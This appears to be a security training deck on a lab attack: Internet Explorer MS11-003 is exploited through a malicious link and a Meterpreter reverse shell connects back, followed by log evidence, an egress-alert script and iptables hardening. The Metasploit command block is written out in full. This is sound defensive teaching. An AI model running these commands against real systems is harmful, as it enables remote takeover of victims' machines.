2. Scenario 1 : Topology
[Diagram: Target -- Firewall Gateway -- Attacker. Internal network 192.168.111.0/24 on one side of the gateway, external network 192.168.178.0/24 on the other.]
Target :
- Windows XP SP3
- The user has an administrator profile
- IP : 192.168.111.129
- Default gateway : 192.168.111.128
- No anti-virus / local Windows Firewall activated
- Vulnerable to MS11-003 (Internet Explorer)
Firewall Gateway :
- eth0 : 192.168.111.128 (internal interface)
- eth1 : 192.168.178.59 (external interface)
Attacker :
- IP : 192.168.178.21
3. Scenario 1 : Firewall rules
• Firewall administration by SSH only from the internal network
• The internal network is allowed to initiate connections with «Any» protocol to the external network (no egress filtering)
4. Scenario 1 : Story-Board
✤ This network topology corresponds to most broadband ADSL Internet connections for home users and SMBs.
✤ The attacker sends a Twitter message to the target. The message contains a malicious URL (possibly shortened) that exploits the Internet Explorer MS11-003 vulnerability.
✤ The target clicks the provided link and MS11-003 is exploited.
✤ After exploitation a reverse_tcp Meterpreter payload is launched; it connects back from the target to the attacker on port 4444/TCP.
✤ No further post-exploitation.
5. Scenario 1 : Metasploit commands
In msfconsole (the exploit starts a web server on the attacker's host, 192.168.178.21:80, serving the malicious page at URI /readme.html; LHOST is where the reverse payload connects back, LPORT stays at the default 4444) :
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
In the Meterpreter session opened when the target browses the page :
sysinfo
ipconfig
route
getuid
6. Scenario 1 : Evidences
Windows security log (process tracking audit) on the target. The Internet Explorer process is created :
A new process has been created:
New Process ID: 3200
Image File Name: C:\Program Files\Internet Explorer\iexplore.exe
Creator Process ID: 2224
User Name: romang
Domain: ERIC-FD2123B3C5
Logon ID: (0x0,0x62764)
The Internet Explorer process (PID 3200) then creates a new «notepad.exe» process. A browser spawning notepad.exe is the tell-tale sign here: Metasploit's browser exploits spawn a fresh process and migrate the payload into it so the session survives the browser crashing or being closed. The creator PID ties the two events together :
A new process has been created:
New Process ID: 3972
Image File Name: C:\WINDOWS\system32\notepad.exe
Creator Process ID: 3200
User Name: romang
Domain: ERIC-FD2123B3C5
Logon ID: (0x0,0x62764)
Logs on the Firewall Gateway. The SYN of the reverse connection from the target to the attacker on 4444/TCP is accepted by rule 5, the «Any» outbound rule :
Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
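The firewall log line above is in Netfilter LOG format, so it can be checked by a small script on the gateway. The following is an added example, not part of the presentation: it parses KEY=VALUE fields out of such a line and raises an alert when an internal host opens a new TCP connection (SYN without ACK) to a non-internal address on a port that is not in the expected set. The internal prefix 192.168.111. comes from the topology slide; the expected outbound ports (53, 80, 443) are an assumption chosen for illustration.

```sh
#!/bin/sh
# Added example: flag unexpected new outbound connections in Netfilter LOG lines.
# Assumptions: the internal network is 192.168.111.0/24 (from the topology slide)
# and only DNS, HTTP and HTTPS are expected outbound (illustrative allowlist).
INT_NET_PREFIX="192.168.111."
EXPECTED_PORTS=" 53 80 443 "

# field LINE KEY : print the value of one KEY=VALUE token (nothing if absent).
field() {
    printf '%s\n' "$1" | tr ' ' '\n' | sed -n "s/^$2=//p" | head -n 1
}

# flag_egress LINE : return 0 and print an alert when LINE is the first SYN of a
# TCP connection from an internal host to a non-internal destination on a port
# outside EXPECTED_PORTS; return 1 for everything else.
flag_egress() {
    line=$1
    src=$(field "$line" SRC)
    dst=$(field "$line" DST)
    proto=$(field "$line" PROTO)
    dpt=$(field "$line" DPT)
    case "$src" in "$INT_NET_PREFIX"*) ;; *) return 1 ;; esac   # not from inside
    case "$dst" in "$INT_NET_PREFIX"*) return 1 ;; esac          # stays inside
    [ "$proto" = TCP ] || return 1
    # The LOG target prints the TCP flags as separate tokens; a SYN without ACK
    # is a new connection, a SYN with ACK or a bare ACK belongs to an existing one.
    case " $line " in *" SYN "*) ;; *) return 1 ;; esac
    case " $line " in *" ACK "*) return 1 ;; esac
    case "$EXPECTED_PORTS" in *" $dpt "*) return 1 ;; esac
    printf 'ALERT unexpected egress %s -> %s:%s/%s\n' "$src" "$dst" "$dpt" "$proto"
    return 0
}

# The line from the Evidences slide: the Meterpreter connect-back to 4444/TCP.
PAGE_LINE='Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0'
# Constructed line (not from the slides): an ordinary HTTPS connection, no alert.
HTTPS_LINE='Feb 21 15:32:10 fw1 kernel: [18428.000000] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.60 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2846 DF PROTO=TCP SPT=1079 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0'

# Usage: feed the kernel log through the filter, e.g.
#   grep 'RULE ' /var/log/kern.log | while IFS= read -r l; do flag_egress "$l"; done
flag_egress "$PAGE_LINE" || true
flag_egress "$HTTPS_LINE" || true
```

Run over the page's line the script prints `ALERT unexpected egress 192.168.111.129 -> 192.168.178.21:4444/TCP`; the constructed HTTPS line produces nothing. The check only fires on the first packet of a connection, so one reverse shell yields one alert rather than one per packet.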
7. Scenario 1 : Lessons Learned
• Update your OS and applications!
• Don't run applications with administrator privileges!
• Never click on unknown links, especially shortened URLs, from unknown sources!
• Install an antivirus, but don't trust it :)
• Don't trust your firewalls (local or remote)!
• Don't allow «Any» outbound protocol connections from your internal network to untrusted networks! Limit your outbound connections to your real needs.
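The firewall rules on slide 3 and the last lesson above describe the same choice from two sides: the «Any» outbound rule that let the reverse shell through, and the egress allowlist that would have stopped it. The following is an added example, not the presenter's configuration: an iptables script for the gateway of the topology slide (eth0 internal, eth1 external, 192.168.111.0/24 inside) with both policies side by side. The «Any» policy reproduces the "RULE 5 -- ACCEPT" log prefix seen on the Evidences slide; the "RULE 6 -- REJECT" prefix and the allowed services (DNS, HTTP, HTTPS) are assumptions for illustration. Setting IPTABLES=echo prints the rules instead of loading them.

```sh
#!/bin/sh
# Added example: gateway rule set with the slide's "Any" egress policy beside a
# restricted one. Assumptions: eth0/eth1 and 192.168.111.0/24 from the topology
# slide; the allowed outbound services and the "RULE 6" prefix are illustrative.
IPTABLES="${IPTABLES:-iptables}"   # IPTABLES=echo for a dry run without root
INT_IF=eth0
EXT_IF=eth1
INT_NET=192.168.111.0/24

# Rules common to both policies: default deny, SSH administration only from the
# internal side (slide 3), and reply traffic for connections already allowed.
base_rules() {
    $IPTABLES -P INPUT DROP
    $IPTABLES -P FORWARD DROP
    $IPTABLES -A INPUT -i lo -j ACCEPT
    $IPTABLES -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    $IPTABLES -A INPUT -i "$INT_IF" -s "$INT_NET" -p tcp --dport 22 -j ACCEPT
    $IPTABLES -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

# Policy as on slide 3: "Any" protocol from inside to outside is accepted.
# This is the rule that logged and accepted the SYN to 4444/TCP on the Evidences slide.
egress_any() {
    $IPTABLES -A FORWARD -i "$INT_IF" -o "$EXT_IF" -s "$INT_NET" \
        -j LOG --log-prefix "RULE 5 -- ACCEPT "
    $IPTABLES -A FORWARD -i "$INT_IF" -o "$EXT_IF" -s "$INT_NET" -j ACCEPT
}

# Restricted policy: only the listed services may be initiated from inside;
# anything else is logged and rejected, so a reverse shell connect-back shows
# up in the log as a REJECT instead of an ACCEPT and never reaches the attacker.
egress_restricted() {
    for svc in udp/53 tcp/53 tcp/80 tcp/443; do
        proto=${svc%/*}
        port=${svc#*/}
        $IPTABLES -A FORWARD -i "$INT_IF" -o "$EXT_IF" -s "$INT_NET" \
            -p "$proto" --dport "$port" -m conntrack --ctstate NEW -j ACCEPT
    done
    $IPTABLES -A FORWARD -i "$INT_IF" -o "$EXT_IF" -s "$INT_NET" \
        -j LOG --log-prefix "RULE 6 -- REJECT "
    $IPTABLES -A FORWARD -i "$INT_IF" -o "$EXT_IF" -s "$INT_NET" -j REJECT
}

# Usage (as root, or with IPTABLES=echo): sh egress.sh any | sh egress.sh restricted
case "${1:-}" in
    any)        $IPTABLES -F; base_rules; egress_any ;;
    restricted) $IPTABLES -F; base_rules; egress_restricted ;;
esac
```

With the restricted policy loaded, the Meterpreter SYN to 192.168.178.21:4444 matches none of the NEW-connection rules and hits the LOG/REJECT pair, so the session never opens and the attempt is still recorded. Extend the `for svc` list with the services the internal network really needs rather than falling back to «Any».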